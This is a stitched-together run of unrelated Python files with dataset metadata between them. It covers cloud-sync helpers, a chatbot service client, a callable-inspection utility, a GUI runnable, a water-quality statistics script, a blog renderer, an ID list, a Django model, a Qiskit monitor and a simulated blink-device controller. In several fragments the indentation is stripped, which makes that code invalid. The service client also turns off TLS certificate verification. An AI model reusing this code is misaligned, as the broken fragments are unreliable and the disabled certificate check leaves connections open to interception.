"""-------------------------------------------------------------------------"""
def make_paths(paths=[]):  # used to initialize the development environment
    if paths:
        for path in paths:
            if not os.path.exists(path):
                os.makedirs(path)
        return "paths created successfully"
    else:
        return "please provide a list of paths"
#make_paths(externalPaths)
"""-------------------------------------------------------------------------"""
def test():
bp=ByPy()
bp.list("basic_linux/") # or whatever instance methods of ByPy class
bp.syncup(base_path)
bp.syndown("/apps/bypy",base_path)
bp.downfile("basic_linux/wps-office_10.1.0.6634_amd64.deb",externalPaths[0])
bp.downfile("basic_linux/can_google.crx",externalPaths[0])
#gui.BypyGui()
"""-------------------------------------------------------------------------"""
def qpython_sync(current_dir="/*/",file_name="*.py"):
move_path="/run/user/1000/gvfs/mtp:host=%5Busb%3A001%2C002%5D/Internal storage/qpython"
sourceFile=os.getcwd()+"/storage/emulated/0/qpython"+current_dir+file_name
targetFile=move_path+current_dir+file_name
if os.path.isfile(sourceFile):
with open(sourceFile, "rb") as source:
with open(targetFile, "wb") as copy:
copy.write(source.read())
print("copy success")
| 1.84375 | 2 |
kbsbot/channel_handler/services.py | astandre/cb-channel-handler-ms | 0 | 12786823 | <reponame>astandre/cb-channel-handler-ms
from requests import Session
import requests
import os
COMPOSE_ENGINE = os.environ.get('COMPOSE_ENGINE')
# COMPOSE_ENGINE = "http://127.0.0.1:5000"
session = Session()
session.trust_env = False
session.verify = False
session.headers["Accept"] = "application/json"
session.headers["Content-Type"] = "application/json"
def compose(data):
"""
This method connects to the compose engine in order to get the answer for the user.
Args:
        :param data: A dict containing data to pass to the engine. This dict contains the user id, the agent, the context and the user input.
Returns:
A dict containing the context and the answer for the user.
"""
url = COMPOSE_ENGINE + "/compose"
try:
r = session.get(url, json=data)
if r.status_code == 200:
response = r.json()
print(response)
return response
except requests.exceptions.RequestException as e:
print(e)
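# Example call (illustrative; the exact key names are an assumption — the
# compose engine contract above only says the dict carries the user id, the
# agent, the context and the user input):
#   compose({"user": "42", "agent": "courses", "context": {}, "input": "hello"})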
| 2.71875 | 3 |
callables.py | StanLivitski/python-runtime | 0 | 12786824 | # vim:fileencoding=UTF-8
#
# Copyright © 2016, 2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 with modifications,
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://raw.githubusercontent.com/StanLivitski/EPyColl/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Helpers for obtaining information about callable
objects and have the same code run different types of callables.
Key elements
------------
prepare_call : A function that unwraps a callable, if necessary,
and tells whether the resulting object requires the ``self``
argument to be called.
call : Calls the target object, prepending ``self``
argument if necessary.
"""
import version
version.requirePythonVersion(3, 3)
def call(callable_, globals_, self, *args, **kwargs):
"""
Calls the target object, prepending ``self`` argument to
the argument list if necessary.
Parameters
----------
callable_ : callable
Reference to a function or method object or wrapper.
globals_ : dict
The dictionary of the module defining the target callable,
or the local dictionary for the scope in which the target callable's
container is defined.
self : object | None
The value to be passed as ``self`` argument, if
required by the target.
args : collections.Iterable
Any positional arguments, excluding ``self``.
kwargs : collections.Mapping
Any keyword arguments, excluding ``self``.
Returns
-------
object | None
Any value returned by the call.
Raises
------
TypeError
If the argument is not callable or has unknown type.
BaseException
Any exception thrown by the call.
See Also
--------
prepare_call : processes the callable before making the call
"""
target, selfNeeded = prepare_call(callable_, globals_)
_args = [ self ] if selfNeeded else []
_args.extend(args)
return target(*_args, **kwargs)
def prepare_call(callable_, globals_):
"""
Unwrap method decorators applied to ``callable_`` and
tell whether the resulting object requires the ``self``
argument to be called.
Dereferences ``@staticmethod`` and ``@classmethod`` decorators
and returns a flag telling whether explicit ``self`` argument
is required. This method may be used when preparing class
definitions (e.g. decorating methods) as well as at runtime.
Parameters
----------
callable_ : callable
Reference to a function or method object or wrapper.
globals_ : dict
The dictionary of the module defining the target callable,
or the local dictionary for the scope in which the target callable's
container is defined. If the container has not yet been defined
(e.g. when processing a decorator) this mapping should also contain
its future qualified name mapped to the ``object`` type value.
Returns
-------
callable
Dereferenced callable object.
boolean
A flag telling whether explicit ``self`` argument must
be on the argument list.
Raises
------
TypeError
If the argument is not callable or has unknown type.
"""
bindable = None
if not callable(callable_) and hasattr(callable_, '__func__'):
if isinstance(callable_, staticmethod):
bindable = False
callable_ = callable_.__func__
if not callable(callable_):
raise TypeError('Argument of type %s is not callable' % type(callable_).__name__)
if hasattr(callable_, '__self__'):
bindable = False
if bindable is None:
prefix = callable_.__qualname__[:-len(callable_.__name__)]
if prefix:
assert '.' == prefix[-1]
prefix = prefix[:-1]
try:
bindable = isinstance(eval(prefix, globals_), type)
except:
bindable = False
else:
bindable = False
return callable_, bindable
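# Minimal usage sketch (illustrative):
#   class Greeter:
#       def hello(self, name):
#           return 'hello ' + name
#   target, needs_self = prepare_call(Greeter.hello, globals())
#   # needs_self is True for an unbound method, so call() prepends `self`:
#   call(Greeter.hello, globals(), Greeter(), 'world')  # -> 'hello world'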
| 2.25 | 2 |
jes/jes-v4.3-linux/Sources/JESRunnable.py | utv-teaching/foundations-computer-science | 0 | 12786825 | <reponame>utv-teaching/foundations-computer-science
#JES- Jython Environment for Students
#Copyright (C) 2002 <NAME>, <NAME>, <NAME>, <NAME>
#See JESCopyright.txt for full licensing information
from java.lang import Runnable
from javax.swing import JOptionPane
################################################################################
# JESRunnable
#
# a runnable object which updates the command window, displaying the new results
# from the execution of the user's code.
################################################################################
class JESRunnable( Runnable ):
######################################################################
# init
# interpreter: the JESInterpreter object that this runnable updates
# output: a string, the output from the user's code
    # errRec: a JESExceptionRecord object, only defined if an exception occurred.
# created from the exception information and stack trace returned
# by sys.exc_info()
######################################################################
def __init__(self,interpreter, output, errRec, mode):
self.interpreter = interpreter
self.output = output
self.mode = mode
if errRec != None:
self.errMsg = errRec.getExceptionMsg()
self.errLine = errRec.getLineNumber()
else:
self.errMsg = ''
self.errLine = None
######################################################################
# run
#
# the method that does all of the updating work.
# this method should ALWAYS be called from within the same thread
# that the GUI executes in.
######################################################################
def run(self):
if self.output != '' and self.output != None:
self.interpreter.sendOutput( self.output )
if self.errMsg != '' and self.errMsg != None:
self.interpreter.sendOutput( self.errMsg )
if self.errLine != None:
self.interpreter.program.gui.editor.showErrorLine(self.errLine)
self.interpreter.program.gui.commandWindow.restoreConsole(self.mode)
self.interpreter.program.gui.setRunning( 0 )
self.interpreter.program.gui.stopWork()
self.interpreter.program.gui.editor.document.removeLineHighlighting()
self.interpreter.program.gui.editor.editable = 1
# needed for midi note playing
import JavaMusic
try:
JavaMusic.cleanUp()
except:
menuBar = self.interpreter.program.gui.getJMenuBar()
mediaMenu = menuBar.getMenu(menuBar.getMenuCount() - 2)
if mediaMenu.getText() == 'MediaTools':
# the above is merely for sanity checking...
#if mediaMenu.getItem(0).isEnabled():
if self.interpreter.program.gui.soundErrorShown == 0:
# we don't want to keep bombarding the user with messages!
# mediaMenu.getItem(0).setEnabled(0)
self.interpreter.program.gui.soundErrorShown = 1
msg = 'Sound card initialization failed!\n\n'
msg += 'You will not be able to use this functionality during the\n'
msg += 'current session of JES. Please make sure your sound card\n'
msg += 'is not currently being used by another program and restart\n'
msg += 'JES.'
JOptionPane.showMessageDialog(self.interpreter.program.gui,
msg, 'Sound Error', JOptionPane.ERROR_MESSAGE)
if self.interpreter.debug_mode:
self.interpreter.debugger.endExecution()
| 3.15625 | 3 |
app/waterQual/30yr/CC/wrtds_WCC_err.py | fkwai/geolearn | 0 | 12786826 | <gh_stars>0
import importlib
from hydroDL.master import basins
from hydroDL.app import waterQuality
from hydroDL import kPath, utils
from hydroDL.model import trainTS
from hydroDL.data import gageII, usgs
from hydroDL.post import axplot, figplot
import torch
import os
import json
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import time
# rmCode = ['00010', '00095', '00400']
# rmName = 'rmTKH'
# rmCode = ['00010', '00095']
# rmName = 'rmTK'
rmCode = ['00010']
rmName = 'rmT'
dirSel = os.path.join(kPath.dirData, 'USGS', 'inventory', 'siteSel')
with open(os.path.join(dirSel, 'dictRB_Y30N5.json')) as f:
dictSite = json.load(f)
codeLst = sorted(list(set(usgs.newC)-set(rmCode)))
siteNoLst = dictSite[rmName]
trainSet = 'B10N5'
testSet = 'A10N5'
df = pd.DataFrame(index=siteNoLst, columns=usgs.newC)
df.index.name = 'siteNo'
dirRoot = os.path.join(kPath.dirWQ, 'modelStat',
'WRTDS-W', 'B10-{}'.format(rmName))
dirOut = os.path.join(dirRoot, 'output')
dirPar = os.path.join(dirRoot, 'params')
dfCorr1 = df.copy()
dfCorr2 = df.copy()
dfRmse1 = df.copy()
dfRmse2 = df.copy()
t0 = time.time()
for kk, siteNo in enumerate(siteNoLst):
print('{}/{} {:.2f}'.format(
kk, len(siteNoLst), time.time()-t0))
saveFile = os.path.join(dirOut, siteNo)
dfP = pd.read_csv(saveFile, index_col=None).set_index('date')
dfP.index = pd.to_datetime(dfP.index)
dfC = waterQuality.readSiteTS(siteNo, varLst=usgs.newC, freq='W')
yr = dfC.index.year.values
for code in codeLst:
ind1 = np.where(yr < 2010)[0]
ind2 = np.where(yr >= 2010)[0]
rmse1, corr1 = utils.stat.calErr(
dfP.iloc[ind1][code].values, dfC.iloc[ind1][code].values)
rmse2, corr2 = utils.stat.calErr(
dfP.iloc[ind2][code].values, dfC.iloc[ind2][code].values)
dfCorr1.loc[siteNo][code] = corr1
dfRmse1.loc[siteNo][code] = rmse1
dfCorr2.loc[siteNo][code] = corr2
dfRmse2.loc[siteNo][code] = rmse2
dfCorr1.to_csv(os.path.join(
dirRoot, '{}-{}-corr'.format(trainSet, trainSet)))
dfRmse1.to_csv(os.path.join(
dirRoot, '{}-{}-rmse'.format(trainSet, trainSet)))
dfCorr2.to_csv(os.path.join(
dirRoot, '{}-{}-corr'.format(trainSet, testSet)))
dfRmse2.to_csv(os.path.join(
dirRoot, '{}-{}-rmse'.format(trainSet, testSet)))
| 1.984375 | 2 |
blog.py | the-it-dude/the-it-dude | 0 | 12786827 | <gh_stars>0
import logging
from jinja2 import Environment, FileSystemLoader, select_autoescape
import yaml
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger()
CONFIG_FILE = 'blog.yml'
class Blog(object):
def __init__(self, config):
self.env = Environment(
loader=FileSystemLoader('./src'),
autoescape=select_autoescape(['html'])
)
self.config = config
def render(self, source, destination, context=None):
"""
Simply glue files together.
"""
        full_context = self.config.get('context', {})
if context is not None:
full_context.update(context)
logger.info("Rendering file: {} > {}".format(source, destination))
logger.debug(" Context: {}".format(repr(context)))
template = self.env.get_template(source)
template.stream(**full_context).dump(destination)
def render_all(self):
for file_config in self.config['files']:
self.render(
source=file_config['source'],
destination=file_config['destination'],
context=file_config.get('context', None)
)
if __name__ == '__main__':
with open(CONFIG_FILE, 'r') as config_file:
        config = yaml.safe_load(config_file)
logger.debug("Config: {}".format(repr(config)))
blog = Blog(config)
blog.render_all()
| 2.6875 | 3 |
app/stratified.py | CMUSTRUDEL/flask-browser | 1 | 12786828 | high_perspective = ['<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5eadd270bd354374a770a538',
'<KEY>',
'<KEY>',
'5e9fa678bd35436be69b2a5e',
'<KEY>',
'<KEY>',
'5eeb0729bd35431ff8d3fadc',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7da4b1bd3543638522a940',
'<KEY>',
'<KEY>',
'5e498c9ebd3543364e1aea31',
'5e40af8bac8db7c63592a473',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e9bc38abd35431275afa132',
'<KEY>',
'5e3dd864bd3543283f73ef51',
'5e7af5a3bd354337a360a294',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e9588febd35432157acf29a',
'<KEY>',
'5e3adb28bd35434aff586c46',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7aca43bd3543414b890ff0',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e2845eabd35433a5078cde6',
'<KEY>',
'5e799d1ebd35432c2a28f4ab',
'5ebba46bbd3543261a0b75e0',
'<KEY>',
'5e659345bd35432eba36b7e3',
'5e4f012dac8db7c635ab2885',
'<KEY>',
'5e9e7cddbd3543498b9b4e77',
'<KEY>',
'5e258361bd35431073ac3196',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7a0de3bd3543722ec74ac7',
'5ea0ff6ebd354377ca40a4d0',
'<KEY>',
'<KEY>',
'<KEY>',
'5ec24ab8fd9edf38797e3a9e',
'<KEY>',
'<KEY>',
'<KEY>',
'5e8a870abd3543695e4646ea',
'5e88be3ebd35436e5533d48c',
'5ea13209bd3543279b20339e',
'5e3d541abd354331243eb4dc',
'<KEY>',
'5e3d5421bd354321def3b482',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e2e7b63bd3543403ea57f38',
'<KEY>',
'<KEY>',
'5ed0b76bbd35437e4ab4a36e',
'5e7e3e1ebd354371da09d498',
'5e6502debd354322f37901aa',
'<KEY>',
'<KEY>',
'5eac250cbd354310d1e8f9be',
'5e8d7b82bd354311592ae22a',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7b1411bd35433aadd9ed6b',
'<KEY>',
'5e410203bd3543203ed17185',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e9fea52bd35432a086f49de',
'<KEY>',
'<KEY>',
'5e87efa0bd35436e55336283',
'5e399811bd35434a9d0c7c1c',
'5e41707eac8db7c635289a8f',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e645fa0bd35433947c40a20',
'<KEY>',
'<KEY>',
'5eb10aa6bd3543708c780cea',
'5e23c281763a8b26aaa38d89',
'<KEY>',
'<KEY>',
'5ea41232bd35436afab04ae0',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e8d4551bd354311592ac165',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e9083a6bd3543219db58a7d',
'<KEY>',
'<KEY>',
'<KEY>',
'5e9023a6bd35431f6aedacda',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e6ccd72bd35432dd15ea0cc',
'5ea7e713bd3543282eea804d',
'<KEY>',
'<KEY>',
'5e7b1420bd35433aadd9ed88',
'<KEY>',
'5e7db811bd3543626e053297',
'5e5f218abd354338b13aa20b',
'<KEY>',
'<KEY>',
'5e2f36edbd354337baabe23a',
'<KEY>',
'<KEY>',
'<KEY>',
'5e8f748ebd3543228aa00d90',
'<KEY>',
'<KEY>',
'5e2adeb7bd35436fc59907ca',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7b1417bd35434e768d80c3',
'5e3d5415bd3543225ac4afb7',
'<KEY>',
'5e7b1410bd35434522e333a7',
'<KEY>',
'<KEY>',
'5ebaff4fbd35437097d7ddb5',
'<KEY>',
'5e7ea488bd354363e2c0e9db',
'5eb06626bd35435932b3721e',
'5e3abe82bd354349e90125b5',
'5e9d4261bd35437da961e410',
'<KEY>',
'5e8590eebd35437469ebe552',
'<KEY>',
'5e59df4abd354338b1373872',
'5e39a3a7bd35433f22ea7747',
'5eada0c7bd3543688a59f52e',
'<KEY>',
'5ec4af67bd3543763417e159',
'5e2fe146bd35432aa312468c',
'5e8ea238bd35430ccad168c2',
'<KEY>',
'<KEY>',
'<KEY>',
'5ea488f6bd3543694bcebeaa',
'<KEY>',
'5ec89851bd77503ee07636be',
'<KEY>',
'5ea945c9bd354376991ebe60',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e53e3dcbd354338b13337e2',
'<KEY>',
'<KEY>',
'5e7be575bd3543414b89b0e0',
'<KEY>',
'<KEY>',
'5e522329bd35432dd14d1da0',
'<KEY>',
'5e906fe7bd35430f344c1e20',
'5e938361bd35431db66e910b',
'<KEY>',
'5e99d6d3bd35432927e34c30',
'5ec9f26fbd77503ee08adf1e',
'5e3d3d67bd35431de5230ca7',
'<KEY>',
'<KEY>',
'<KEY>',
'5e8e7d1dbd35430a0b73a519',
'5ed26ce8bd77503ee02bf99e',
'<KEY>',
'<KEY>',
'5e657561bd354338b13eb2ce',
'<KEY>',
'5e272a8dbd354343faf9c2e1',
'<KEY>',
'<KEY>',
'5e8066cebd3543464e2f41b8',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7ce40fbd354368c77c0c80',
'<KEY>',
'5e7a9186bd35434c25a298c4',
'<KEY>',
'5ea64998bd35434639f60d6e',
'<KEY>',
'5e7afb8dbd35434ac8ae80fa',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e316a60bd354302f7ea3ec7',
'<KEY>',
'<KEY>',
'5e7fd1a8bd35434921e9b731',
'<KEY>',
'5e9ab7a1bd3543342c24002c',
'5e7fb11abd354352ec828e2d',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e47970bbd3543364e199ece',
'<KEY>',
'<KEY>',
'5e2e87f0bd354373f054d5ed',
'5e54483ebd35432dd14e8194',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e3d12e0bd35432ad7dff825',
'<KEY>',
'5ea310d1bd35436ae2e6a350',
'<KEY>',
'5ecd106dbd77503ee084d044',
'<KEY>',
'<KEY>',
'<KEY>',
'5e8c2ad4bd3543797eb5f62a',
'<KEY>',
'5ed0862bbd354355218c17a9',
'5e272ccabd35434161a98f5d',
'<KEY>',
'5e2ec388bd354321507e4d72',
'<KEY>',
'<KEY>',
'<KEY>',
'5eb06041bd354369b7ef3ea0',
'5ed31d92bd354362ae5aeaea',
'5e256551bd35431415399ed2',
'5e8fdd32bd354323b1be9110',
'<KEY>',
'5e761b8ebd35433947cdece3',
'<KEY>',
'<KEY>',
'<KEY>',
'5e4d308bac8db7c63536add9',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7d7b94bd3543616a30f1a7',
'5eb2610abd35433915efd181',
'<KEY>',
'5e645f8abd354325d6a39b78',
'<KEY>',
'5ed23465bd77503ee0de3e9f',
'<KEY>',
'<KEY>',
'5e9e599abd354353bdd065e7',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7a7861bd354343331edbf8',
'<KEY>',
'<KEY>',
'<KEY>',
'5ebeb0d3bd35431a33fbe487',
'5eaffa31bd3543614b1c3016',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5ecf6ea1bd354379eaa08910',
'5e7a9e25bd35433ed568a3f5',
'<KEY>',
'5e418388ac8db7c6354c280a',
'<KEY>',
'5ea6d571bd354326d88e6a56',
'5e957591bd35431a34d0b8de',
'5e3d4e42bd35432524f8d755',
'5e93e33abd354324255292d0',
'5e683d18bd354338b1408261',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e399812bd35434a9d0c7c1e',
'<KEY>',
'<KEY>',
'5ece9964bd77503ee00a576a',
'<KEY>',
'5e71d2bbbd35432eba3d8e3d',
'5e4d91dfbd354329f971720e',
'<KEY>',
'<KEY>',
'<KEY>',
'5ea0a066bd35435e12e60e99',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e814e9fbd35435eb45ef974',
'5eca7e7cbd77503ee051cc35',
'<KEY>',
'5ec66ad2bd354336ac2eda08',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e61e85dbd354329f97ed5cc',
'<KEY>',
'<KEY>',
'5ec96cb7bd77503ee0b16e85',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e5b6a75bd35431d33658e9d',
'<KEY>',
'5e4d1763bd354336ddfa06cd',
'5e7a846abd354345e894ab0e',
'<KEY>',
'<KEY>',
'<KEY>',
'5e3a8b01bd354345530000e0',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e512012ac8db7c635ec7617',
'5e7b7eeebd3543414b897709',
'5e9172e5bd3543248842e40a',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7ce02bbd354361056ea950',
'<KEY>',
'5ec8a8e7bd35431974e4a4ed',
'<KEY>',
'<KEY>',
'5e49c9ceac8db7c6353d6ef9',
'5e441dbebd354322c5e93322',
'<KEY>',
'5e3d541dbd354331243eb4e5',
'<KEY>',
'5e2c9fedbd35437d92fe0e01',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e3e6a27bd35432981a64085',
'5eca1b95bd77503ee0c1cc4f',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e91a037bd35431e2a669624',
'5e7e0ed7bd354373da170b01',
'5e8d7e93bd3543141202718c',
'5e9d798fbd35431f2574a55c',
'5e86d942bd354374e3114294',
'<KEY>',
'5e2f8f2abd35437c044c5678',
'<KEY>',
'<KEY>',
'5ebe5f00bd35434c6a200fec',
'<KEY>',
'<KEY>',
'5e9752d2bd35432157adccda',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7af95dbd354337435532a1',
'5e7a1747bd3543414b889483',
'<KEY>',
'<KEY>',
'<KEY>',
'5e813d69bd354354052754a2',
'<KEY>',
'<KEY>',
'5e80ae9dbd354353a0dc2383',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e914dedbd35431e73fc59fe',
'5ec9430abd3543575458d4a1',
'<KEY>',
'<KEY>',
'5e5358a6bd35431cf00a1b7e',
'5ec622a4bd35433ac1a19a89',
'5e80536abd354348df041fa4',
'<KEY>',
'<KEY>',
'<KEY>',
'5e848be8bd354373ddad65b2',
'<KEY>',
'<KEY>',
'5e8afa90bd35437156ee4d64',
'5e9d2afabd35431a8b85b190',
'5e7a98c9bd35433f084f7a96',
'<KEY>',
'5e9d3dd0bd35434f2949ae2c',
'<KEY>',
'5e99b714bd35436f01407ffe',
'5e2f1da1bd35436b0ef74e2e',
'5e3a3308bd35433ee0d5e60d',
'<KEY>',
'<KEY>',
'5e39ecb0bd35433ee0d5b850',
'<KEY>',
'<KEY>',
'5e53223abd354337716e6896',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5eb616abbd354362352a6c06',
'5e41a7c8ac8db7c6359415c0',
'5e33d611bd3543374c1ee86e',
'5e63a96dbd354338b13da5b2',
'5ed1d191bd3543696fa10202',
'<KEY>',
'5e9a8a00bd35436c60a03caa',
'5e8df015bd3543139ef158ed',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e922a66bd354322dacba73d',
'5ed328edbd77503ee0480db3',
'<KEY>',
'5e3d541bbd354321def3b477',
'5ec27a5dbd35433e4834cf5f',
'5e59a622bd35431fc2b40e6a',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e7a2d5abd354340bd54a35c',
'<KEY>',
'<KEY>',
'5e47a930bd35431fc2a780c3',
'<KEY>',
'<KEY>',
'<KEY>',
'5ebcd306fd9edf38796ca0dc',
'<KEY>',
'<KEY>',
'5e43a73fbd354332d1ed7f63',
'5e812be3bd3543540527480c',
'5e405d59bd354331ede4f2a1',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5ea9f8e1fd9edf3879dad6aa',
'5e80a416bd354354d26ad3a5',
'<KEY>',
'<KEY>',
'<KEY>',
'5e3da920bd3543221becc934',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5ed4977dbd77503ee0951848',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e4b5becac8db7c6358131a6',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5ec8c0a5bd3543089e62db6f',
'5e63b642bd3543229fdeee0d',
'5eb4433abd35434d916378b6',
'5e7fc0a7bd35434a41518387',
'5e8cd3e5bd35430f79a5f0a0',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5e3edca7bd3543221bed8703',
'5e6b2549bd3543229fe23ddf',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5ea69c4ebd354348d61288bd',
'5e714e6abd35431fc2c29076',
'<KEY>',
'5ec67e9ebd77503ee033b2ab',
'5eb025a2bd3543053232e572',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5ea40508bd354338a05e2a15',
'5e41a52abd354336ddf21e5c',
'<KEY>',
'<KEY>',
'5e9ad2c7bd3543589e6945dd',
'<KEY>',
'5ec74cf5bd77503ee080be8d',
'5ed36c36bd77503ee0beea33',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'5ed36c32bd77503ee0bee3e0',
'<KEY>']
| 1.234375 | 1 |
core/models/program_availability.py | themightychris/prevention-point | 1 | 12786829 | <filename>core/models/program_availability.py
from django.db import models
from core.models import Program
class ProgramAvailability(models.Model):
program = models.ForeignKey(Program, on_delete=models.CASCADE)
day_of_week = models.CharField(max_length = 10)
start_time = models.TimeField()
end_time = models.TimeField()
| 1.9375 | 2 |
Basic/Realtimeinfo.py | JHP4911/Quantum-Computing-UK | 51 | 12786830 | print('\nDevice Monitor')
print('----------------')
from qiskit import IBMQ
from qiskit.tools.monitor import backend_overview
IBMQ.enable_account('Insert API token here') # Insert your API token in to here
provider = IBMQ.get_provider(hub='ibm-q')
backend_overview() # Function to get all information back about each quantum device
print('\nPress any key to close')
input() | 2.265625 | 2 |
Battery_Testing_Software/labphew/controller/blink_controller.py | sjoerdsein/FAIR-Battery | 2 | 12786831 | <reponame>sjoerdsein/FAIR-Battery<gh_stars>1-10
# -*- coding: utf-8 -*-
"""
================
Blink controller
================
This is an example of a controller with a fake (invented) device. It should help to guide
developers to create new controllers for real devices.
Example usage can be found at the bottom of the file under if __name__=='__main__'
"""
import logging
import time
class BlinkController:
"""
Blink Controller: Fake Device controller to act as an example.
"""
def __init__(self):
"""
Create Blink controller object which simulates a fake device.
"""
self.logger = logging.getLogger(__name__)
# Set parameters to simulate the device
self.__simulated_device_blink_period= 1 #
self.__simulated_device_start_time = time.time()
self.__simulated_device_status = False
self.__simulated_device_enabled = True
# Set user parameters:
self.max_blink_period = 2
self.min_blink_period = 0.2
self.logger.debug('BlinkController object created')
self.connect()
def connect(self):
"""
Fake method to connect to fake blink device
:return:
:rtype:
"""
self.logger.info('"Connected" to fake blink device')
def set_blink_period(self, period_s):
"""
Method that mimics setting a device parameter.
:param period_s: blink period (in seconds)
:type period_s: float
"""
# You could do some checks first. For example to see if the value is in an allowed range:
if period_s > self.max_blink_period:
self.logger.warning(f'Blink period of {period_s}s exceeds maximum allowed. Setting period to {self.max_blink_period}s')
period_s = self.max_blink_period
if period_s < self.min_blink_period:
            self.logger.warning(f'Blink period of {period_s}s is below the minimum allowed. Setting period to {self.min_blink_period}s')
period_s = self.min_blink_period
# Your code to communicate with the device goes here.
# For the purpose of demonstration, this method simulates setting a parameter on a device:
self.logger.debug('"Sending" blink period of {} to device'.format(period_s))
self.__simulated_device_blink_period = period_s
self.__simulated_device_start_time = time.time()
self.__simulated_device_status = not self.__simulated_device_status
def enable(self, enable):
"""
Method that mimics setting a device parameter.
:param enable: Enable device output
:type enable: bool
"""
# Your code to communicate with the device goes here.
# For the purpose of demonstration, this method simulates setting a parameter on a device:
self.__simulated_device_enabled = bool(enable)
self.logger.debug('Device is "{}"'.format(self.__simulated_device_enabled))
def get_status(self):
"""
Method that mimics communicating with a device and retrieving a status.
:return: True when device is "on"
:rtype: bool
"""
# Your code to communicate with the device goes here.
# For the purpose of demonstration, this method returns a simulated status:
if self.__simulated_device_enabled:
return bool(int((time.time()-self.__simulated_device_start_time)/self.__simulated_device_blink_period/.5) % 2)
else:
self.logger.warning('Device is disabled')
return False
def disconnect(self):
"""
Fake method to disconnect from fake blink device
:return:
:rtype:
"""
self.logger.info('"Disconnected" from fake blink device')
if __name__ == "__main__":
import labphew # Import labphew, for labphew style logging
device = BlinkController()
    print('The state of the device is:', device.get_status())
# Example of modifying the blink period:
device.set_blink_period(3)
device.set_blink_period(0.1)
# # Example of acquiring data (the device state) in a for loop and then plotting it with matplotlib:
# import matplotlib.pyplot as plt
# record = []
# for i in range(100):
# time.sleep(0.01)
# record.append(device.get_status())
# plt.plot(record)
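    # Additional usage sketch (not part of the original example): poll the simulated
    # device for a short while and report how often it was "on". Only methods defined
    # above (set_blink_period, get_status, disconnect) are used; the timings are arbitrary.
    device.set_blink_period(0.5)
    on_count = 0
    polls = 20
    for _ in range(polls):
        time.sleep(0.05)
        on_count += int(device.get_status())
    print('Device reported "on" in {}/{} polls'.format(on_count, polls))
    device.disconnect()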
| 3.21875 | 3 |
glue/algorithms/square.py | glensc/glue | 514 | 12786832 | import copy
class SquareAlgorithmNode(object):
